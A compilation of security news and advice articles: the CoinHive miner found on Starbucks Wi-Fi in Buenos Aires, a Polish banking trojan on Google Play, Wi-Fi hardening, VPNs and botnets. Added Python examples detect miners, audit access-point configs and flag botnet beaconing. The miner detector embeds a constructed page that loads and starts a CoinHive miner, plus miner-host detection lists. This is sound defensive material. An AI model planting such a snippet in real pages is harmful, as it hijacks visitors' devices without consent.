Hackers Hijacked an Internet Provider to Mine Cryptocurrency with Laptops In Starbucks

When Noah Dinkin, CEO of Stensul, a platform that helps marketers craft emails, visited a Starbucks in Buenos Aires last week, he discovered that the store’s Wi-Fi provider was hijacking his laptop to mine a digital currency. At the time, a Starbucks spokesperson stated that the issue was resolved quickly and wasn’t widespread, but Dinkin disagreed on the latter point. “This was observed by a friend and I in three separate Starbucks stores in Buenos Aires over multiple days following my original tweet, that week,” he wrote on Twitter on Wednesday. “It wasn't just one store.”

The Argentine internet provider responsible for Starbucks’ Wi-Fi in Buenos Aires, Fibertel, blamed hackers for planting the miner code on its network.

“Fibertel detected a security intrusion on one of the equipment that forms part of the Wi-Fi access solution that [we] provide to our client Starbucks Argentina,” Fibertel spokesperson Florencia Marcote said in an email. “The incident was identified and solved immediately by the specialized support.”

“It is not about any Fibertel practice, but an intrusion of security,” Marcote continued.

Cryptocurrency miners hijack your computer’s resources—usually your CPU—to crunch some math problems in order to generate digital coins. These scripts can impact your computer’s performance.

Dinkin noticed a 10-second delay when connecting to the Starbucks location’s Wi-Fi, so he checked the source code of the landing page and found a script for CoinHive, a popular embeddable cryptocurrency miner. Over the next few days, he and a friend checked at two more Starbucks locations in Buenos Aires and found the same code in both.
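The check Dinkin did by hand, as an added example that is not part of the original article: parse a captive-portal landing page and flag scripts loaded from, or calling into, the CoinHive miner. Both HTML pages are constructed; the coinhive.com hostname, the coinhive.min.js library name and the CoinHive.Anonymous constructor are the publicly documented CoinHive ones.

```python
"""Scan a captive-portal landing page for an injected browser cryptominer.

Added example, not from the original article. The two HTML pages are
constructed; the coinhive.com hostname, the coinhive.min.js library name and
the CoinHive.Anonymous constructor are the publicly documented CoinHive ones.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

MINER_HOSTS = {"coinhive.com", "coin-hive.com"}
MINER_MARKERS = ("CoinHive.Anonymous", "CoinHive.User", "coinhive.min.js")

# Constructed page: the miner runs for ten seconds before the portal continues,
# matching the delay the article describes.
INJECTED_PAGE = """<html><head><title>Free Wi-Fi</title>
<script src="//coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');
  miner.start();
  setTimeout(function () { window.location = '/portal/accept'; }, 10000);
</script></head><body>Accept terms to connect</body></html>"""

# Constructed page with only the portal's own script.
CLEAN_PAGE = """<html><head><title>Free Wi-Fi</title>
<script src="/static/portal.js"></script>
<script>document.getElementById('accept').onclick = acceptTerms;</script>
</head><body>Accept terms to connect</body></html>"""


class ScriptCollector(HTMLParser):
    """Record external script URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


def _is_miner_host(url):
    """True if the script URL (absolute or scheme-relative) points at a miner host."""
    host = (urlparse(url, scheme="https").hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in MINER_HOSTS)


def find_miner_indicators(html):
    """Return one finding per suspicious script, or [] for a clean page."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.srcs:
        if _is_miner_host(src) or any(m in src for m in MINER_MARKERS):
            findings.append(f"external script from miner host: {src}")
    for body in collector.inline:
        hits = [m for m in MINER_MARKERS if m in body]
        if hits:
            findings.append(f"inline script uses miner API: {', '.join(hits)}")
    return findings
```

Run it against the HTML a portal actually serves (saved from the browser) rather than the URL, since the injection happened on the provider's equipment rather than on the origin server.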

“Our stores are where a lot of our customers go to do personal things and conduct business, so we want to make sure that they’re safe and secure,” Reggie Borges, a Starbucks spokesperson, said over the phone. “Any time we see something that could happen in other places, we have to check it to make sure there’s no vulnerabilities and take next steps.”

According to Fibertel, the issue was isolated to Buenos Aires and has been resolved.

“This happened only [locally] in Buenos Aires and is completely solved since last week,” spokesperson Marcote wrote in an email.

With the value of cryptocurrencies skyrocketing, the incident in Argentina may be a pale horse as criminals continue to find ways to get other people to generate digital coins for them.

A Trojan Targeting Polish Banks was Found in Google Play

It has happened again: several banking Trojan samples have been found on Google Play, this time carrying malicious code that targets a number of Polish banks.

The malware was disguised as seemingly legitimate apps “Crypto Monitor”, a cryptocurrency price tracking app, and “StorySaver”, a third-party tool for downloading stories from Instagram.

The malicious code is able to display fake notifications and login forms on the infected device to harvest login credentials used to access legitimate banking applications. The code is also able to intercept SMS messages to bypass two-factor authentication used by the financial institutions.

The same malware was discovered by experts at security firm RiskIQ in November.

According to researchers from ESET, the “Crypto Monitor” app was uploaded to the Play store on November 25 by the developer walltestudio, while the “StorySaver” app was uploaded by the developer kirillsamsonov45 on November 29.

“Together, the apps had reached between 1000 and 5000 downloads at the time we reported them to Google on December 4. Both apps have since been removed from the store.” states the analysis published by ESET.

When the user launches one of the malicious apps, it compares the apps installed on the infected device against a list of fourteen apps used by Polish banks; if one of them is found, the malicious code can display a fake login form imitating that of the targeted legitimate app.

App name           Package name
Alior Mobile       com.comarch.mobile
BZWBK24 mobile     pl.bzwbk.bzwbk24
Getin Mobile       com.getingroup.mobilebanking
IKO                pl.pkobp.iko
Moje ING mobile    pl.ing.mojeing
Bank Millennium    wit.android.bcpBankingApp.millenniumPL
mBank PL           pl.mbank
BusinessPro        pl.bph
Nest Bank          pl.fmbank.smart
Bank Pekao         eu.eleader.mobilebanking.pekao
PekaoBiznes24      eu.eleader.mobilebanking.pekao.firm
plusbank24         eu.eleader.mobilebanking.invest
Mobile Bank        eu.eleader.mobilebanking.raiffeisen
Citi Handlowy      com.konylabs.cbplpat

In some cases the fake login form is displayed only after the user taps a fake notification that the malware displays, imitating the notifications used by the targeted bank’s app.

“ESET’s security systems detect the threat as Android/Spy.Banker.QL and prevent it from getting installed.” states ESET.

“ESET telemetry shows that 96% of the detections come from Poland (the remaining 4% from Austria), apparently due to local social engineering campaigns propagating the malicious apps.” 

The experts noticed that it is very easy to remove the malicious apps by going to Settings > (General) > Application manager/Apps, searching for the malicious apps and uninstalling them.

“To avoid falling prey to mobile malware in the future, make sure to always check app ratings and reviews, pay attention to what permissions you grant to apps, and use a reputable mobile security solution to detect and block latest threats.” concluded ESET.

ESET, who credited Witold Precikowski for the discovery, included the IoCs for this specific threat in its report.

How to Secure Your Business Wi-Fi Network

Today’s small business network may include a wide range of wireless devices, from computers and phones to IP cameras, POS (Point of Sale) devices, and networked storage with confidential customer data. Taking basic steps to secure your network will help protect your business data – and your customers’ information – from compromise.

Understand How a Wireless Network Works

Going wireless generally requires connecting an internet "access point" – like a cable or DSL modem – to a wireless router, which sends a signal through the air, sometimes as far as several hundred feet. Any device within range can pull the signal from the air and access the internet.

Unless you take certain precautions, anyone nearby can use your network. That means your neighbors – or any hacker nearby – could "piggyback" on your network or access information on your device. If an unauthorized person uses your network to commit crime or send spam, the activity could be traced back to your account.

Use Encryption on Your Wireless Network

Once you go wireless, you should encrypt the information you send over your wireless network, so that nearby attackers can’t eavesdrop on these communications. Encryption scrambles the information you send into a code so that it’s not accessible to others. Using encryption is the most effective way to secure your network from intruders.

Two main types of encryption are available for this purpose: Wi-Fi Protected Access (WPA) and Wired Equivalent Privacy (WEP). Your computer, router, and other equipment must use the same encryption. WPA2 is strongest; use it if you have a choice. It should protect you against most hackers. Some older routers use only WEP encryption, which likely won’t protect you from some common hacking programs. Consider buying a new router with WPA2 capability.

Wireless routers often come with the encryption feature turned off. You must turn it on. The directions that come with your router should explain how. If they don't, check the company’s website.

Limit Access to Your Network

Allow only specific devices to access your wireless network. Every device that is able to communicate with a network is assigned a unique Media Access Control (MAC) address. Wireless routers usually have a mechanism to allow only devices with particular MAC addresses to access the network. MAC addresses can be copied by an attacker who observes them, so don't rely on this step alone.

Secure Your Router

It’s also important to protect your network from attacks over the internet by keeping your router secure. Your router directs traffic between your local network and the internet. So, it’s your first line of defense for guarding against such attacks. If you don't take steps to secure your router, strangers could gain access to sensitive personal or financial information on your device. Strangers also could seize control of your router, to direct you to fraudulent websites.

Change the name of your router from the default. The name of your router (often called the service set identifier or SSID) is likely to be a standard, default ID assigned by the manufacturer. Change the name to something unique that only you know.

Change your router's pre-set password(s). The manufacturer of your wireless router probably assigned it a standard default password that allows you to set up and operate the router, as its “administrator.” Hackers know these default passwords, so change them to something only you know. The same goes for any default “user” passwords. Use long and complex passwords – think at least 12 characters, with a mix of numbers, symbols, and upper and lower case letters. Visit the company’s website to learn how to change the password.

Turn off any “Remote Management” features. Some routers offer an option to allow remote access to your router’s controls, such as to enable the manufacturer to provide technical support. Never leave this feature enabled. Hackers can use it to get into your home network.

Log out as Administrator: Once you’ve set up your router, log out as administrator, to lessen the risk that someone can piggyback on your session to gain control of your device.

Keep your router up-to-date: To be secure and effective, the software that comes with your router needs occasional updates. Before you set up a new router and periodically thereafter, visit the manufacturer’s website to see if there’s a new version of the software available for download. To make sure you hear about the latest version, register your router with the manufacturer and sign up to get updates.

And when you secure your router, don’t forget to secure your computer too. Use the same basic computer security practices that you would for any computer connected to the internet. For example, use protections like antivirus, antispyware, and a firewall – and keep these protections up-to-date.
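The encryption, SSID, passphrase and MAC-filter items of the checklist above, turned into an automated audit as an added example (not part of the original article). It assumes the access point is a Linux box running hostapd and reads standard hostapd keys (ssid, wpa, wpa_key_mgmt, rsn_pairwise, wep_key0, wpa_passphrase, macaddr_acl); both configs are constructed. The admin password and remote-management items live in the router’s management interface, not in hostapd, so they are out of scope here.

```python
"""Audit a hostapd access-point config against the Wi-Fi checklist above.

Added example, not from the original article. Assumes a Linux access point
running hostapd; WEAK_CONF and HARDENED_CONF are constructed.
"""

# Common manufacturer default SSIDs (assumption: extend for your vendors).
DEFAULT_SSIDS = {"linksys", "netgear", "dlink", "default", "wireless"}
MIN_PASSPHRASE = 12  # the article's "at least 12 characters"

WEAK_CONF = """\
interface=wlan0
ssid=linksys
# wpa=0 with a static WEP key: WEP only
wpa=0
wep_default_key=0
wep_key0=0123456789
"""

HARDENED_CONF = """\
interface=wlan0
ssid=Cafe-Back-Office
# wpa=2 accepts WPA2 only, rsn_pairwise=CCMP forbids TKIP
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=correct-horse-battery-staple-2017
# macaddr_acl=1 denies stations not listed in accept_mac_file
macaddr_acl=1
accept_mac_file=/etc/hostapd/hostapd.accept
"""


def parse_hostapd(text):
    """Parse hostapd's key=value lines; blank lines and #-comments are skipped."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition("=")
            conf[key.strip()] = value.strip()
    return conf


def audit(conf):
    """Return a list of findings; an empty list means the checklist passes."""
    findings = []
    ssid = conf.get("ssid", "")
    if not ssid or ssid.lower() in DEFAULT_SSIDS:
        findings.append("SSID missing or a manufacturer default; pick a unique name")
    if any(k.startswith("wep_key") for k in conf):
        findings.append("WEP key configured; WEP does not stop common cracking tools")
    wpa = int(conf.get("wpa", "0"))  # bitfield: 1 = WPA, 2 = WPA2
    if wpa == 0:
        findings.append("wpa=0: open or WEP-only network; set wpa=2 for WPA2")
    elif wpa & 1:
        findings.append("WPA1 still accepted; set wpa=2 so only WPA2 clients connect")
    if wpa & 2 and "CCMP" not in conf.get("rsn_pairwise", ""):
        findings.append("rsn_pairwise does not list CCMP; WPA2 with TKIP only is weak")
    if wpa and len(conf.get("wpa_passphrase", "")) < MIN_PASSPHRASE:
        findings.append(f"wpa_passphrase shorter than {MIN_PASSPHRASE} characters")
    if conf.get("macaddr_acl", "0") != "1":
        findings.append("MAC filtering off (macaddr_acl != 1); extra layer, not a substitute")
    return findings


def audit_text(text):
    """Convenience wrapper: parse then audit a config file's contents."""
    return audit(parse_hostapd(text))
```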

Protect Your Network during Mobile Access

Apps now allow you to access your home network from a mobile device. Before you do, be sure that some security features are in place.

Use a strong password on any app that accesses your network. Log out of the app when you’re not using it. That way, no one else can access the app if your phone is lost or stolen.

Password protect your phone or other mobile device. Even if your app has a strong password, it’s best to protect your device with one, too.

How to Secure your Internet Connection with a VPN

VPNs, or Virtual Private Networks, have been in the news a lot lately. In July, there was the revelation that Apple had removed VPNs from the Chinese App Store, and more recently in October, it turned out that VPNs were an effective safeguard against the worrying KRACK Wi-Fi vulnerability. Even with all the publicity, there are plenty of people who still don’t know what a VPN is and how to use it – the name alone can seem strange and abstract to the average consumer. However, using a VPN couldn’t be simpler. Let’s take a quick look at how the software works and why it’s an essential tool for your digital life.

How a VPN works

When you access the internet without a VPN, your computer connection is basically ‘naked’, as it were. Your Internet Service Provider (ISP) can see what content you access. That includes streaming sites, torrents, and games. But when you connect to a VPN, the VPN server acts as an intermediary between your computer and the web.

To put it simply: you send a request to the VPN, the VPN sends a request to the server where the content is hosted, and then the process runs in reverse. However, because the VPN is between you and the content, your ISP will only see you accessing the VPN. Thus, it won’t see your internet activity. Besides acting as an intermediary, VPNs protect you in two other key ways: they encrypt your internet traffic and grant you a new IP address (so your real IP is hidden).

Encryption 101

On a basic level, encryption involves using advanced mathematics to make your data unreadable to third parties – it will look like gibberish to everyone other than you and your VPN. In effect, a VPN can hide your internet traffic not just from your ISP, but also from anyone else on the same Wi-Fi network as you. That makes VPNs a necessary tool on public Wi-Fi in places like cafes or libraries.

Why IP addresses matter

VPNs also grant you a new IP address. This not only safeguards your anonymity, but also widens the amount of content you can access. Think of your IP address as being like a physical address in the real world – it tells internet servers where to send information and content you request. But because a VPN provides you with a new IP address, sites you access only know the IP of the VPN, and not the one tied to your computer.

Also, many content providers like Netflix and BBC iPlayer use IP addresses as a way to figure out whether or not to allow you to access content that is limited to a particular region. By using a VPN server in a different country, you can get a foreign IP address, unlocking tons of media you might not otherwise have access to.

VPNs vs proxies: what VPNs actually hide

Of course, if you’ve ever used a proxy, a lot of this might sound familiar. Plenty of people use proxies to surf the web. However, the major difference between proxies and VPNs is that while proxies mask your traffic via your web browser, VPNs cover all your internet activity, including torrent clients and games. What does that mean for the average consumer? If you want total privacy and encryption, then VPN is the way to go.

Picking a VPN: what to look for

Now that you’ve gained a bit of VPN expertise, you may feel ready to try one for yourself. But how do you choose? A few considerations will help you judge for yourself. Below are three questions (and some related follow-up queries) that will come in handy.

Can you use the VPN on all your devices? A good VPN provider should be able to offer you a working service wherever you go. On the road? You’ll need a VPN on your smartphone or tablet. Want peace of mind at home? Get a VPN on your desktop computer or network router. When checking to see what platforms a VPN service provides apps for, also check the company’s device usage policy. Can you connect to the VPN on more than one device at a time? If so, how many devices are supported?

What VPN protocols are available? VPN protocols control how data is passed between your device and the VPN server. PPTP is the fastest protocol, but it’s also the least secure. Meanwhile, OpenVPN is probably the most secure, but it doesn’t work on all devices. A good VPN provider should have multiple protocols available, allowing you to switch between them as circumstances require.

Does it have the server locations you need? Location, location, location… If you’re hoping to access geoblocked content from a particular country (say, Brazil), then make sure that the VPN provider you choose has a server location in the country. Some VPNs have servers in almost 100 countries, meaning you should have more than enough options.

Those are some basic points to look out for, but the truth is that VPN providers can offer a raft of different features. Beyond various settings and extras like proprietary security protocols, at the end of the day, what’s most important is trust.

You’re entrusting a VPN provider with your privacy, so you should make sure they have the track-record and reputation to back up that responsibility.

Shining a Light on Botnets

When cybercriminals strike, it is often the groups or individuals responsible for the attack (e.g., Anonymous, Guardians of Peace, MafiaBoy); the victims (e.g., Target, Sony, Dyn) or the malware itself (e.g., WannaCry, Shamoon, Conficker) that make the headlines. The critical role of botnets in the organization and the launch of cyberattacks is less commonly written about. This article explains what botnets are, how they operate and what can be done to protect your computers and devices from being recruited to a botnet.

Understanding Botnets

As we discussed in a previous post about cybersecurity ignorance, over 70 percent of Americans are unaware of what a botnet is. When the security of a computer or connected device is compromised by an attack, there are several things that its payload can do. It could execute a piece of ransomware, encrypting user files and displaying a message demanding payment for their release. It could launch spyware to collect information about the user, stealing personal data or harvesting contacts. It could even cause damage to your hardware and shut down your device – although this is not usually in the cybercriminal’s best interest.

Or it could connect your computer to a hidden network of similar hijacked devices and inform its master that it is ready to take orders. It would become what is termed a bot or a zombie, and while it may still operate normally in other respects, it has become the latest addition to a botnet.

Once recruited, a bot will start monitoring for messages from its new master or masters. These messages could originate from a dedicated server (sometimes termed a command and control server) or even via code on a website. This is the traditional server-client botnet. Some of the latest botnets operate on a peer-to-peer (P2P) basis, with each new device acting as both zombie and zombie master in a distributed network.

Methods of Attack Using Botnets

So what can a botnet do? There are certain types of attack that a botnet will usually instigate, although its activity can be quickly changed through altering instructions. Since the devices in question are already compromised, there is no security to overcome and no resistance to its orders.

One of the most common tasks of a botnet is to distribute spam, which will usually contain ransomware. To give an idea of the scale of the problem, Cisco’s 2017 Annual Cybersecurity Report shows that spam accounts for 65 percent of all email, with 8 to 10 percent cited as malicious. Due to a combination of spam filters and consumer education, this method of attack is relatively unproductive and relies upon vast numbers of messages being sent out. For example, when ESET uncovered the Windigo botnet in 2014, it was sending out 35 million spam messages per day.

Another mode of operation is the infamous DDoS attack. In an instant, all bots in the botnet can be instructed to flood a server or servers with connection requests, effectively taking that service out of action. Again, this is a blunt, relatively unsophisticated weapon and, due to improved DDoS mitigation technology, is usually short-term in nature.

For client-server types of botnets, the messages are usually transmitted using the Internet Relay Chat (IRC) protocol. Such communication can be relatively easy to detect and block or even hijack, so smarter forms of attack are being developed to outwit cybersecurity providers. For example, it has been proven possible to issue commands via Twitter, LinkedIn and even JPEG metadata, and to switch between such channels. The P2P type of botnet mentioned above also avoids the pitfalls of IRC communication.
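The detection the last two paragraphs allude to, as an added example that is not part of the original article: a bot checking in with its master shows up in connection logs both as traffic to the classic IRC port range and, whatever channel it uses, as connections to one destination at a near-constant interval. The log format (timestamp, source, destination, destination port) is a hypothetical flow export and the lines are constructed.

```python
"""Spot command-and-control check-ins (IRC or otherwise) in connection logs.

Added example, not from the original article. SAMPLE_LOG is constructed in a
hypothetical "timestamp src dst dport" flow format. Two heuristics: traffic
to the IRC port range, and connections repeating at a near-constant interval.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

IRC_PORTS = set(range(6660, 6670)) | {6697}
MIN_BEACONS = 4    # need a few check-ins before judging regularity
MAX_JITTER = 0.10  # stdev/mean of the gaps; bots are far more regular than people

SAMPLE_LOG = """\
2017-12-14T10:00:00 10.0.0.23 203.0.113.7 6667
2017-12-14T10:05:00 10.0.0.23 203.0.113.7 6667
2017-12-14T10:10:01 10.0.0.23 203.0.113.7 6667
2017-12-14T10:15:00 10.0.0.23 203.0.113.7 6667
2017-12-14T10:20:00 10.0.0.23 203.0.113.7 6667
2017-12-14T10:01:13 10.0.0.41 198.51.100.9 443
2017-12-14T10:07:48 10.0.0.41 198.51.100.9 443
2017-12-14T10:22:05 10.0.0.41 198.51.100.9 443
2017-12-14T10:40:30 10.0.0.41 198.51.100.9 443
2017-12-14T10:02:00 10.0.0.77 192.0.2.50 8080
2017-12-14T10:32:00 10.0.0.77 192.0.2.50 8080
2017-12-14T11:02:00 10.0.0.77 192.0.2.50 8080
2017-12-14T11:32:00 10.0.0.77 192.0.2.50 8080
"""


def parse_log(text):
    """Group connection timestamps by (src, dst, dport)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst, dport = line.split()
        flows[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    return flows


def analyse(text):
    """Return [(src, dst, dport, [reasons])] for flows that look like C2."""
    findings = []
    for (src, dst, dport), times in parse_log(text).items():
        reasons = []
        if dport in IRC_PORTS:
            reasons.append("IRC port")
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Regular check-ins: low jitter relative to the mean interval.
        if len(times) >= MIN_BEACONS and mean(gaps) > 0 \
                and pstdev(gaps) / mean(gaps) < MAX_JITTER:
            reasons.append(f"beacon every ~{round(mean(gaps))}s")
        if reasons:
            findings.append((src, dst, dport, reasons))
    return findings


if __name__ == "__main__":
    for src, dst, dport, reasons in analyse(SAMPLE_LOG):
        print(f"{src} -> {dst}:{dport}  {'; '.join(reasons)}")
```

The third host is flagged on regularity alone, which is the property a bot keeps even after its master moves the channel off IRC; the second host, a person browsing at irregular intervals, is not.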

Lack of Vigilance is Still the Weakest Link

Facing up to the power and sophistication of botnets can be scary at first, but it must be remembered that there are equally smart minds at work in the battle against cybercrime. The best forms of protection remain unchanged: install regular security updates, use strong password protection, look for the padlock next to a URL before divulging sensitive information and never click on email or social media links unless you are 100 percent sure they are genuine.

As explained in Malwarebytes’ ‘State of Malware Report,’ there are specific concerns about the prioritization of security when it comes to the Internet of Things and DDoS attacks. These vulnerabilities were ruthlessly exploited in October 2016 by the Mirai botnet, which targeted Dyn Inc. and effectively shut down Twitter, Spotify and other sites.

It was discovered that Mirai’s ability to launch such a ferocious DDoS attack (at one point reaching speeds of 1 Tbps) was due to its choice of bots – IP cameras, home routers and other devices rather than PCs. Many of these were configured with their factory passwords and so were simple to hack.

As the Internet of Things grows, it will become more important than ever for companies to choose devices with robust security protection, to update passwords upon setup and to up-skill their IT support teams to monitor for threats. Likewise, homeowners should shop for smart devices with security in mind and change their default passwords.

Why the Worst Cyberattack May Never Happen

If the fear of botnets bringing down the internet is keeping you up at night, then this end section should give you some reassurance. Setting up a botnet that can successfully evade all of the security measures set up to detect and bring it down is resource-intensive; this makes it an incredibly valuable asset. The bigger a botnet is, the harder it becomes for it to fly under the radar. When large botnets are detected, it is often in the wake of a big attack that exposes its chain of command. Once found, botnets often fall hard with significant computer resources put out of action by law enforcement and people sent to jail.

In most cases, it serves the cybercriminals best to use botnets as stealth weapons, launching the occasional assault before covering their tracks, evolving and then looking for the next opportunity to strike.